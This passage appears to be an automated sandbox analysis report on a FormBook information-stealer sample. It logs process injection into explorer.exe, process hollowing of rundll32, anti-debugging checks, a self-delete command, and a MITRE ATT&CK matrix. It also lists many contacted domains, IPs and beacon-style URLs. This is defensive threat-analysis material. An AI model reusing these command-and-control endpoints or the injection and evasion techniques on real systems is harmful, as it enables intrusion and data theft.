          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]6_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]6_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]6_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h]6_2_046D4015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h]6_2_046D4015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]6_2_04687016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]6_2_04687016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]6_2_04687016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046058EC mov eax, dword ptr fs:[00000030h]6_2_046058EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]6_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov ecx, dword ptr fs:[00000030h]6_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]6_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]6_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]6_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]6_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]6_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046490AF mov eax, dword ptr fs:[00000030h]6_2_046490AF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463F0BF mov ecx, dword ptr fs:[00000030h]6_2_0463F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h]6_2_0463F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h]6_2_0463F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609080 mov eax, dword ptr fs:[00000030h]6_2_04609080
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683884 mov eax, dword ptr fs:[00000030h]6_2_04683884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683884 mov eax, dword ptr fs:[00000030h]6_2_04683884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C962 mov eax, dword ptr fs:[00000030h]6_2_0460C962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h]6_2_0460B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h]6_2_0460B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h]6_2_0462B944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h]6_2_0462B944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov ecx, dword ptr fs:[00000030h]6_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463513A mov eax, dword ptr fs:[00000030h]6_2_0463513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463513A mov eax, dword ptr fs:[00000030h]6_2_0463513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]6_2_04609100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]6_2_04609100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]6_2_04609100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046941E8 mov eax, dword ptr fs:[00000030h]6_2_046941E8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]6_2_0460B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]6_2_0460B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]6_2_0460B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h]6_2_046361A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h]6_2_046361A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046869A6 mov eax, dword ptr fs:[00000030h]6_2_046869A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]6_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]6_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]6_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]6_2_046851BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C182 mov eax, dword ptr fs:[00000030h]6_2_0462C182
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A185 mov eax, dword ptr fs:[00000030h]6_2_0463A185
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632990 mov eax, dword ptr fs:[00000030h]6_2_04632990
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h]6_2_046BB260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h]6_2_046BB260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8A62 mov eax, dword ptr fs:[00000030h]6_2_046D8A62
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464927A mov eax, dword ptr fs:[00000030h]6_2_0464927A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]6_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]6_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]6_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]6_2_04609240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CEA55 mov eax, dword ptr fs:[00000030h]6_2_046CEA55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04694257 mov eax, dword ptr fs:[00000030h]6_2_04694257
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h]6_2_04644A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h]6_2_04644A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04618A0A mov eax, dword ptr fs:[00000030h]6_2_04618A0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]6_2_04605210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov ecx, dword ptr fs:[00000030h]6_2_04605210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]6_2_04605210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]6_2_04605210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460AA16 mov eax, dword ptr fs:[00000030h]6_2_0460AA16
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.borderlesstrade.info
          Source: C:\Windows\explorer.exeDomain query: www.swashbug.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.253.212.22 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hispekdiamond.com
          Source: C:\Windows\explorer.exeDomain query: www.bl927.com
          Source: C:\Windows\explorer.exeDomain query: www.7chd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.15.160.167 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.zagorafinancial.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.142.156.44 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.209.114.201 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.montcoimmigrationlawyer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mojilifenoosa.com
          Source: C:\Windows\explorer.exeDomain query: www.3992199.com
          Source: C:\Windows\explorer.exeDomain query: www.fibermover.com
          Source: C:\Windows\explorer.exeDomain query: www.funnyfootballmugs.com
          Source: C:\Windows\explorer.exeDomain query: www.przyczepy.net
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 169.1.24.244 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cdefenders.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,0_2_740D1000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Users\user\Desktop\NdBLyH2h5d.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeThread register set: target process: 3388Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 300000Jump to behavior
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000002.478596652.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery141Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385309 Sample: NdBLyH2h5d.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 32 www.plaisterpress.com 2->32 34 www.missjeschickt.com 2->34 36 missjeschickt.com 2->36 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 4 other signatures 2->60 11 NdBLyH2h5d.exe 18 2->11         started        signatures3 process4 dnsIp5 44 192.168.2.1 unknown unknown 11->44 30 C:\Users\user\AppData\...\6oxdti6l9qd.dll, PE32 11->30 dropped 70 Detected unpacking (changes PE section rights) 11->70 72 Maps a DLL or memory area into another process 11->72 74 Tries to detect virtualization through RDTSC time measurements 11->74 76 Contains functionality to prevent local Windows debugging 11->76 16 NdBLyH2h5d.exe 11->16         started        file6 signatures7 process8 signatures9 46 Modifies the context of a thread in another process (thread injection) 16->46 48 Maps a DLL or memory area into another process 16->48 50 Sample uses process hollowing technique 16->50 52 Queues an APC in another process (thread injection) 16->52 19 explorer.exe 16->19 injected process10 dnsIp11 38 missjeschickt.com 81.169.145.72, 49734, 80 STRATOSTRATOAGDE Germany 19->38 40 zagorafinancial.com 162.209.114.201, 49723, 80 RACKSPACEUS United States 19->40 42 20 other IPs or domains 19->42 62 System process connects to network (likely due to code injection or exploit) 19->62 23 rundll32.exe 19->23         started        signatures12 process13 signatures14 64 Modifies the context of a thread in another process (thread injection) 23->64 66 Maps a DLL or memory area into another process 23->66 68 Tries to detect virtualization through RDTSC time measurements 23->68 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NdBLyH2h5d.exe21%VirustotalBrowse
          NdBLyH2h5d.exe8%MetadefenderBrowse
          NdBLyH2h5d.exe29%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.rundll32.exe.4d44f8.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.NdBLyH2h5d.exe.2640000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.NdBLyH2h5d.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.NdBLyH2h5d.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.rundll32.exe.4b17960.5.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp100%Avira URL Cloudmalware
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          www.montcoimmigrationlawyer.com/uoe8/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          		52.15.160.167
          		truefalse
            		high
            montcoimmigrationlawyer.com
            		184.168.131.241
            		truetrue
              		unknown
              missjeschickt.com
              		81.169.145.72
              		truetrue
                		unknown
                www.przyczepy.net
                		185.253.212.22
                		truetrue
                  		unknown
                  k9cdna.51w4.com
                  		45.142.156.44
                  		truetrue
                    		unknown
                    www.swashbug.com
                    		169.1.24.244
                    		truetrue
                      		unknown
                      mojilifenoosa.com
                      		184.168.131.241
                      		truetrue
                        		unknown
                        zagorafinancial.com
                        		162.209.114.201
                        		truetrue
                          		unknown
                          shops.myshopify.com
                          		23.227.38.74
                          		truetrue
                            		unknown
                            fibermover.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.hispekdiamond.com
                              		213.171.195.105
                              		truetrue
                                		unknown
                                www.plaisterpress.com
                                		104.21.24.135
                                		truetrue
                                  		unknown
                                  www.borderlesstrade.info
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bl927.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.montcoimmigrationlawyer.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mojilifenoosa.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.missjeschickt.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.3992199.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.fibermover.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.funnyfootballmugs.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.7chd.com
                                                  		unknown
                                                  		unknowntrue
